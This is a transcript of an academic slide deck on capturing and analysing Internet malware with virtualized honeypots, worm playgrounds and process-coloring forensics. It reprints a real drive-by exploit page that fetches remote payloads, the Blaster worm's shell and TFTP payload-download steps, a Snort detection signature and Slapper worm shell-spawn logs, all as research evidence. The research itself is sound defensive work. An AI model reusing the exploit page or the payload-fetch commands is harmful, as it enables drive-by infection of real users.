enabling internet malware investigation and defense using virtualization dongyan xu department of...
Post on 21-Dec-2015
222 views
TRANSCRIPT
![Page 1: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/1.jpg)
Enabling Internet Malware Investigation and Defense Using Virtualization
Dongyan Xu
Department of Computer Science andCenter for Education and Research in
Information Assurance and Security (CERIAS)Purdue University
![Page 2: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/2.jpg)
Collaborators
Florian Buchholz (James Madison U.) Xuxian Jiang (George Mason U.) Junghwan Rhee (Purdue U.) Ryan Riley (Purdue U.) Eugene H. Spafford (Purdue U.) AAron Walters (Fortify Research) Helen Wang (Microsoft Research) Yi-Min Wang (Microsoft Research)
![Page 3: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/3.jpg)
Motivation: Rampant Malware Outbreaks
Blaster
Nimda
CodeRed
Source: Symantec Internet Security Threat Report
Internet malware remains a top threat Malware: Virus, Worm, Spyware, Keylogger, Bot…
![Page 4: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/4.jpg)
Motivation: Stealthy Malware
Recruiting Vulnerable Nodes (e.g. to create Botnet) Zero-day exploits w/o software patches Low-and-slow propagation New attack strategies
Exploiting vulnerable client-side software, such as IE Propagating malware with RFID tags
Providing “Value-Added” Service (or rather, harm) DDoS, spamming, identity theft, … Sell/rent botnets for profit
![Page 5: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/5.jpg)
Reality & Challenges Lack of investigation platform that enables
Early detection and capture of malware incidents Replay and observation of malware behavior
At Internet scale this is hard to build Increased spreading speed, sophistication, and malice
Slammer Worms infect 75,000 hosts in 10 minutes (Moore et al, 2003)
Stealthy Malware, Zero-day Exploits, Mutations, …
![Page 6: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/6.jpg)
Our Integrated Malware Research Framework
Malware Trap
Behavioral Footprinting
Contamination Tracking
Malware Playground
Back-End: vGround
Playground
External
Infection
Internal
Contamination
System Randomization
Front-End: Collapsar Honeyfar
mCollapsar: Security’04, NDSS’06, JPDC’06
vGround: RAID’05
Proc. Coloring: ICDCS’06
Investigation
DefenseDetection
WORM’06
![Page 7: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/7.jpg)
Part I: Malware Capture
Malware Trap
Behavioral Footprinting
Contamination Tracking
Front-End: Collapsar
*
Malware Playground
Back-End: vGround
System Randomization
Collapsar: Security’04, NDSS’06, JPDC’06
vGround: RAID’05
Coloring: ICDCS’06
WORM’06
![Page 8: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/8.jpg)
Existing Approach: Honeypot
Domain B
Domain A
Domain C
Internet
Two Weaknesses Manageability vs. Detection Coverage Security Risks On-Site Attack Occurrences
![Page 9: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/9.jpg)
Our Approach: Collapsar
Domain B
Domain A
Domain C
Front-End
VM-based Honeypots
Management Station
Collapsar Center
Correlation Engine
RedirectorRedirector
Collapsar HoneyfarmCollapsar Honeyfarm
Redirector
Benefit 1: Centralized management of
honeypots w/ distributed (virtual) presence
Benefit 1: Centralized management of
honeypots w/ distributed (virtual) presence
Benefit 2: Off-site attack occurrences
Benefit 2: Off-site attack occurrences
Benefit 3: New possibilities for real-time
attack correlation and log mining
Benefit 3: New possibilities for real-time
attack correlation and log mining
![Page 10: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/10.jpg)
VM-based Honeypots
Domain B
Domain A
Domain C
Front-End
Collapsar Center
RedirectorRedirector
Redirector
Collapsar as a Server-side Honeyfarm
Passive Honeypots w/ Vulnerable Server-side Software Web Servers (e.g., Apache, IIS, …) Database Servers (e.g., Oracle, MySQL, …)
Blaster (2003) Sasser (2004) Zotob (2005)
![Page 11: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/11.jpg)
Malicious Web
Server
VM-based Honeypots
Domain B
Domain A
Domain C
Front-End
Collapsar Center
RedirectorRedirector
Redirector
Collapsar as a Client-side Honeyfarm
Active Honeypots w/ Vulnerable Client-side Software Web Browsers (e.g., IE, Firefox, …) Email Clients (e.g., Outlook, …)
[ HoneyMonkey, NDSS’06]
PlanetLab (310 sites)
288 malicious sites / 2 zero-day exploits288 malicious sites / 2 zero-day exploits
![Page 12: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/12.jpg)
Upon Clicking a malicious URL http://xxx.9x.xx8.8x/users/xxxx/xxx/laxx/
z.html Result:
22 unwanted programs are installed without user’s consent!
22 unwanted programs are installed without user’s consent!
MS04-013
MS03-011
MS05-002
<html><head><title></title></head><body>
<style>* {CURSOR: url("http://vxxxxxxe.biz/adverts/033/sploit.anr")}</style>
<APPLET ARCHIVE='count.jar' CODE='BlackBox.class' WIDTH=1 HEIGHT=1><PARAM NAME='url' VALUE='http://vxxxxxxe.biz/adverts/033/win32.exe'></APPLET><script>
try{document.write('<object data=`ms-its:mhtml:file://C:\fo'+'o.mht!'+'http://vxxxx'+'xxe.biz//adv'+'erts//033//targ.ch'+'m::/targ'+'et.htm` type=`text/x-scriptlet`></ob'+'ject>');}catch(e){} </script>
</body></html>
A Real Incident: Exploitation of Client-side Vulnerability
![Page 13: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/13.jpg)
Related Work
Honeyd [Security’04]iSink[RAID’04] IMS[NDSS’05]
honeyclient [RECON’05]
Domino[NDSS’04] NetBait[‘03]
Potemkin[SOSP’05]GQ[’06]
Collapsar [Security’04, JPDC’06]
High-Interaction w/ Real Services
Off-Site Attack Occurrences
Aggregation of Scattered Unused Address Space
Passive & Active Honeypots
Passive Passive PassiveActive Passive & Active
![Page 14: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/14.jpg)
Part II: Malware Playground
Malware Trap
Behavioral Footprinting
Contamination Tracking
Front-End: Collapsar
Malware Playground
Back-End: vGround
*
System Randomization
Collapsar: Security’04, NDSS’06, JPDC’06
vGround: RAID’05
Coloring: ICDCS’06
![Page 15: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/15.jpg)
Challenges
Fidelity Real worms Confinement Destructive worms Scalability Epidemic propagation
pattern Experimental Efficiency
![Page 16: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/16.jpg)
A Virtualization-Based Worm Playground
paris.cs.purdue.edu
High Fidelity VM: Full-System Virtualization
Strict Confinement VN: Link-Layer Network Virtualization
Easy Deployment Locally deployable
Efficient Experiments Images generation time: 60 seconds Boot-strap time: 90 seconds Tear-down time: 10 seconds
A Worm Playground
VirtualizationVirtualization
In “Fighting Computer Virus Attacks”, Peter Szor, USENIX Security Symp., 2004 In “Fighting Computer Virus Attacks”, Peter Szor, USENIX Security Symp., 2004
![Page 17: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/17.jpg)
Challenge in Achieving Scalability
Three Main Techniques: VM Footprint Minimization
Redhat 9.0: 1G 32M Delta Virtualization (a.k.a., Copy-on-Write) Worm-driven vGround Runtime Expansion
2000+ virtual nodes in 10 physical machines
![Page 18: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/18.jpg)
Worm Expert’s Comments on vGround
![Page 19: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/19.jpg)
vGround Impact & Applications
Evaluation Correctness of documented worm/malware
analysis Effectiveness of defense mechanisms
Education Potentials
![Page 20: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/20.jpg)
Part III: Malware Defense
Malware Trap
Behavioral Footprinting
ContaminationTracking
Front-End: Collapsar
Malware Playground
Back-End: vGround
System Randomization
Internal
Contamination
Collapsar: Security’04, NDSS’06, JPDC’06
vGround: RAID’05
Coloring: ICDCS’06
![Page 21: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/21.jpg)
Malware Forensics
For each malware incident, it is desirable to find out: Break-in Point:
How did the malware break into the system? Contaminations:
What did the malware do after the break-in?
![Page 22: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/22.jpg)
Current Approach
httpd
/bin/sh
wgetRoot kitRoot kit
Local filesLocal files
AlertAlert
httpd netcat • /etc/shadow• Confidential
Info
• /etc/shadow• Confidential
Info
Question 1: How did the malware
break into the system?
Question 1: How did the malware
break into the system?
Question 2: What did the
malware do after break-in?
Question 2: What did the
malware do after break-in?
![Page 23: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/23.jpg)
httpd
/bin/sh
wgetRoot kitRoot kit
Local filesLocal files
httpd netcat • /etc/shadow• Confidential
Info
• /etc/shadow• Confidential
Info
“httpd” READS an incoming request
“httpd” CREATES a new process “/bin/sh”
“/bin/sh” CREATES a new process “netcat”
“netcat” READS “/etc/shadow” file
“/bin/sh” MODIFIES local files
“/bin/sh” CREATES a new process “wget”
“wget” CREATES local file(s) - “Root kit”
Current Approach
Log
1: Online Log Collection
AlertAlert
![Page 24: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/24.jpg)
1: Online Log Collection
httpd
/bin/sh
wgetRoot kitRoot kit AlertAlert
Backward Tracking
Current Approach
Log
2: Offline Backward Tracking
“wget” CREATES local file(s) - “Root kit”
“httpd” CREATES a new process “/bin/sh”
“/bin/sh” CREATES a new process “wget”Break-in Point
!
Break-in Point !
[King+, SOSP’03][King+, SOSP’03]
![Page 25: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/25.jpg)
1: Online Log Collection
httpd
/bin/sh
wgetRoot kitRoot kit
Local filesLocal files
AlertAlert
netcat • /etc/shadow• Confidential
Info
• /etc/shadow• Confidential
Info
Current Approach
Log
2: Offline Backward Tracking3: Offline Forward Tracking
Forward Tracking
“httpd” CREATES a new process “/bin/sh”
“/bin/sh” CREATES a new process “netcat”
“netcat” READS “/etc/shadow” file
“/bin/sh” CREATES a new process “wget”
“wget” CREATES local file(s) - “Root kit”
Break-in Point !
Break-in Point !
“/bin/sh” MODIFIES local files
![Page 26: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/26.jpg)
Weaknesses of Current Approach
Backward Tracking Break-in Point Inputs: Detection point and the entire Log
Forward Tracking Contaminations Inputs: Break-in point and the entire Log
timeIntrusion Detected
Intrusion Occurred
Long Detection Period
Analyze the entire log !Analyze the entire log !
High Volume Log Data: 1.2 gigabytes per day under server workload
![Page 27: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/27.jpg)
Log
A suspicious log entry
Main Idea: Information Flow-Preserving Logging
ApacheApache SendmailSendmail DNSDNS MySQLMySQL
Our Approach - Process Coloring
![Page 28: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/28.jpg)
httpd
Our Approach - Process Coloring
s80httpdrcinit
s45named
s30sendmail
s55sshd
s80httpd
s30sendmail
s45named
s55sshd
/bin/sh
wgetRoot kitRoot kit
Local filesLocal files
AlertAlert
netcat • /etc/shadow• Confidential
Info
• /etc/shadow• Confidential
Info
1: Initial Coloring
2: Coloring Diffusion
Log
Benefit 2: Color-based log
partition for contamination analysis
Benefit 2: Color-based log
partition for contamination analysis
Benefit 1: Immediate identification
of break-in point
Benefit 1: Immediate identification
of break-in point
![Page 29: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/29.jpg)
Color Diffusion Model
Color Diffusion Model
OS-level Information Flow (Buchholz 2005)
Operation Diffusion syscalls
CREATE create <s1, o1>create <s1, s2>
color(o1) = color(s1)color(s2) = color(s1)
create, mkdir, linkfork, vfork,
clone
READ read <s1, o1>read <s1, s2>
color(s1) = color(s1)υ color(o1)
color(s1) = color(s1)υ color(s2)
read, readv, recvptrace
WRITEwrite <s1, o1>write <s1, s2>
color(o1) = color(s1)υ color(o1)
color(s2) = color(s1)υ color(s2)
write, writev, sendPtrace, wait,
signal
----DESTROY destroy <s1, o1>destroy <s1, s2>
unlink, rmdir, closeexit, kill
![Page 30: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/30.jpg)
...BLUE: 673["sendmail"]: 5_open("/proc/loadavg", 0, 438) = 5BLUE: 673["sendmail"]: 192_mmap2(0, 4096, 3, 34, 4294967295, 0) =
1073868800BLUE: 673["sendmail"]: 3_read(5, "0.26 0.10 0.03 2...", 4096) = 25BLUE: 673["sendmail"]: 6_close(5) = 0BLUE: 673["sendmail"]: 91_munmap(1073868800, 4096) = 0...RED: 2568["httpd"]: 102_accept(16, sockaddr{2, cbbdff3a}, cbbdff38) = 5RED: 2568["httpd"]: 3_read(5, "\1281\1\0\2\0\24...", 11) = 11RED: 2568["httpd"]: 3_read(5, "\7\0À\5\0\128\3\...", 40) = 40RED: 2568["httpd"]: 4_write(5, "\132@\4\0\1\0\2\...", 1090) = 1090…RED: 2568["httpd"]: 4_write(5, "\128\19Ê\136\18\...", 21) = 21RED: 2568["httpd"]: 63_dup2(5, 2) = 2RED: 2568["httpd"]: 63_dup2(5, 1) = 1RED: 2568["httpd"]: 63_dup2(5, 0) = 0RED: 2568["httpd"]: 11_execve("/bin//sh", bffff4e8, 00000000)RED: 2568["sh"]: 5_open("/etc/ld.so.prelo...", 0, 8) = −2RED: 2568["sh"]: 5_open("/etc/ld.so.cache", 0, 0) = 6
Process Coloring Log – Slapper Worm
![Page 31: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/31.jpg)
Evaluation
Lion Slapper SARSTime period
being analyzed
24 hours 24 hours 24 hours
# worm-related entries
66,504 195,884 19,494
Exploited Service
BIND(CVE-2001-
0010)
Apache(CAN-2002-0656)
Samba(CAN-2003-
0085)
% of Log Inspected
48.7% 65.9% 12.1%
Benefit for Backward Tracking: Immediate identification of break-in
point
Benefit for Backward Tracking: Immediate identification of break-in
point
Benefit for Forward Tracking: Reduced log volume for contamination
analysis
Benefit for Forward Tracking: Reduced log volume for contamination
analysis
![Page 32: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/32.jpg)
Question : Can we trust a compromised
system to collect log information?
Question : Can we trust a compromised
system to collect log information?
Challenge in Log Collection
OS Kernel
User Process 1
User Process 2
Logging
System Call Interception
![Page 33: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/33.jpg)
OS Kernel
User Process 1
Host OS Kernel + VMM
ptrace
User Process 2
LoggingLogging
Logging
Virtual M
achine Guest OS Kernel/UML
Interception on system virtualization path
Virtual Machine Introspection [Garfinkel+, NDSS’03]
More tamper-resistant
![Page 34: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/34.jpg)
On-going Work
Multi-Dimensional Worm Profiling & Identification Content Fingerprinting
Unique recurring content Behavioral Footprinting
Unique recurring behavior Infection Cycle Probing Exploitation Replication
Payload
![Page 35: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/35.jpg)
MSBlaster/Windows Worm
192.168.0.1
Blaster Target/RPC192.168.10.11
1. Exploits target on port 135/TCP 2. Binds svchost.exe to port
4444/TCP via injected code
3. Connects to target on port 4444/TCP
4. Creates a shell “cmd.exe” and binds it to port 4444/TCP
5. Creates “TFTP Server” on port 69/UDP
6. Sends “TFTP” command to shell
7. Runs TFTP command; “teleports” msblast.exe file
8. Sends “START msblast.exe” command 9. Runs worm on target!
10. Closes connection
>tftp –I 192.168.0.1 GET msblast.exe
11. Shell closes
alert ip $EXTERNAL_NET any -> $HOME_NET 135 (msg:"RPC DCOM exploit/ Blaster Worm Attack"; content:"| 77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B |"; …)
alert ip $EXTERNAL_NET any -> $HOME_NET 135 (msg:"RPC DCOM exploit/ Blaster Worm Attack"; content:"| 77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B |"; …)
![Page 36: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/36.jpg)
Worm Name Infection Vector
Behavioral Footprints
2112221111 RUUASSRASS AAMSBlaster RPC-DOM
SYN ,135/victim /infecter,* TCP, : S1
ACK SYN, /infecter,* ,135/victim TCP, :SA1
/victim* r,69/infecte UDP, : U1
RST ,135/victim /infecter,* TCP, : R1
ACK ,135/victim /infecter,* TCP, : A1
SYN m,4444/victi /infecter,* TCP, : S2
ACK SYN, /infecter,* m,4444/victi TCP, :SA2
ACK m,4444/victi /infecter,* TCP, : A 2
r69/infecte /victim,* UDP, : U1
RST m,4444/victi /infecter,* TCP, : R 2
alert ip $EXTERNAL_NET any -> $HOME_NET 135 (msg:"RPC DCOM exploit/ Blaster Worm Attack"; content:"| 77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B |"; …)
alert ip $EXTERNAL_NET any -> $HOME_NET 135 (msg:"RPC DCOM exploit/ Blaster Worm Attack"; content:"| 77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B |"; …)
Exploitation
Replication
![Page 37: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/37.jpg)
Worm Name Infection Vector
Behavioral Footprints
2112221111 RUUASSRASS AAMSBlaster
Welchia
Sasser
Ramen
Lion
Slapper
SARS
RPC-DOM
LSASS
LPRng
WU-FTPD
NFS-UTILS
BIND
APACHE
SAMBA
4443222111 FFCCFFCRSS F
22211211111 RUUUUCFFCII
2334443211 RFFFFCCCRC
)(3322111 flawedRCRCRSS F
23332211111 RFFCCUUURSS F
23332111 RFFCCFFC
34443222112211 RFFCCFFCFCUUUU
2423
22
322111 CCCFCFFCi
i
![Page 38: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/38.jpg)
Summary
Domain B
Domain A
Domain C
Front-End
Redirector
Redirector
Redirector
vGround II vGround I
CollapsarCollapsar
Design and evaluation of advanced malware defense mechanisms using our unique integrated malware research
platform
![Page 40: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/40.jpg)
Backup Slides
![Page 41: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/41.jpg)
Another Example Incident: Windows XP Server-side Honeypot/VMware Vulnerability
RPC DCOM vulnerability (Microsoft Security Bulletin MS03-026)
Time-line Deployed: 22:10:00pm,
11/26/03 MSBlast: 00:36:47am,
11/27/03 Enbiei: 01:48:57am, 11/27/03 Nachi: 07:03:55am, 11/27/03
http://www.cs.purdue.edu/homes/jiangx/collapsarhttp://www.cs.purdue.edu/homes/jiangx/collapsar
![Page 42: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/42.jpg)
Host OS / VMM
vGround: Network Virtualization
Host OS / VMM
Virtual Machine 1 Virtual Machine 2
Virtual Switch 1
IP-IP
Option 1: Network-Layer Virtualization (e.g., X-Bone)
Option 1: Network-Layer Virtualization (e.g., X-Bone)
Option 2: Link-Layer Virtualization (e.g., VIOLIN)
Option 2: Link-Layer Virtualization (e.g., VIOLIN)
Guest O
S
![Page 43: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/43.jpg)
Logging Integrity -- Existing Approach
User Space
Kernel Space fork(“/bin/sh”)
System Call Dispatcher
01
34
283
System Call Table
2 fork
restart
exit
sys_restart_syscall
sys_exit
sys_forkread
write
ni_syscall
sys_read
sys_write
sys_ni_syscall
result
result
result
log_restart_syscall
log_exit
log_fork
log_read
log_write
log_ni_syscall
System call interception
System call interception
Unreliable!
Unreliable!
![Page 44: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/44.jpg)
Virtual Machine Introspection [Garfinkel+, NDSS’03]
Interception at System Virtualization Path
Virtual Machine Monitor (VMM)
Guest OS 1 Guest OS 2
Hardware
Type 1 VMM
Virtual Machine Monitor (VMM)
Guest OS 1 Guest OS 2
Hardware
Host OS
Type 2 VMM
Guest OS 2Guest OS 2
Logging
Logging
Tamper-Resistant
!
Tamper-Resistant
!
![Page 45: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/45.jpg)
Process Coloring -- Slapper Worm
inet_sock(80)
2568: httpd
2568(execve): /bin//sh
2568(execve): /bin/bash -i
2586: /bin/rm –rf /tmp/.bugtraq.c2587: /bin/cat
/tmp/.uubugtraq /tmp/.bugtraq.c
fd 5
recv
execve
execve
fork, execvefork, execve
open, dup2, write unlink
accept
dup2, read
![Page 46: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/46.jpg)
Process Coloring Log – Slapper Worm
inet_sock(80)
2568: httpd
2568(execve): /bin//sh
2568(execve): /bin/bash -i
2586: /bin/rm –rf /tmp/.bugtraq.c2587: /bin/cat
/tmp/.uubugtraq /tmp/.bugtraq.c
fd 5
recv
execve
execve
fork, execvefork, execve
open, dup2, write unlink
accept
dup2, read
![Page 47: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/47.jpg)
Counter-attacks against Proc. Coloring
Coloring mixing attack Good news: an important anomaly itself Bad news: need for advanced filtering
policies Low-level attack
Kernel integrity (e.g. CoPilot, Livewire, Pioneer)
Shadow structure via VMM Diffusion-cutting attack
Covert channels
![Page 48: Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research](https://reader032.vdocuments.site/reader032/viewer/2022032006/56649d6c5503460f94a4c03a/html5/thumbnails/48.jpg)
SYN ,135/victim ter,4581/infec TCP, : S1
ACK SYN, ter,4581/infec ,135/victim TCP, :SA1
Footprinting Representation
1st TCP handshake
135/TCP
2nd TCP handshake
4444/TCP (shell)
MSBlaster Worm
69/UDP (tftp)
RST
Sending “tftp …”
RST
2112221111 RUUASSRASS AA
m1552/victi r,69/infecte UDP, : U1
RST ,135/victim ter,4581/infec TCP, : R1
ACK ,135/victim ter,4581/infec TCP, : A1
SYN m,4444/victi ter,4599/infec TCP, : S2
ACK SYN, ter,4599/infec m,4444/victi TCP, :SA2
ACK m,4444/victi ter,4599/infec TCP, : A 2
r69/infecte m,1552/victi UDP, : U1
RST m,4444/victi ter,4599/infec TCP, : R 2
SYN ,135/victim /infecter,* TCP, : S1
ACK SYN, /infecter,* ,135/victim TCP, :SA1
/victim* r,69/infecte UDP, : U1
RST ,135/victim /infecter,* TCP, : R1
ACK ,135/victim /infecter,* TCP, : A1
SYN m,4444/victi /infecter,* TCP, : S2
ACK SYN, /infecter,* m,4444/victi TCP, :SA2
ACK m,4444/victi /infecter,* TCP, : A 2
r69/infecte /victim,* UDP, : U1
RST m,4444/victi /infecter,* TCP, : R 2
alert ip $EXTERNAL_NET any -> $HOME_NET 135 (msg:"RPC DCOM exploit/ Blaster Worm Attack"; content:"| 77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B |"; …)
alert ip $EXTERNAL_NET any -> $HOME_NET 135 (msg:"RPC DCOM exploit/ Blaster Worm Attack"; content:"| 77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B |"; …)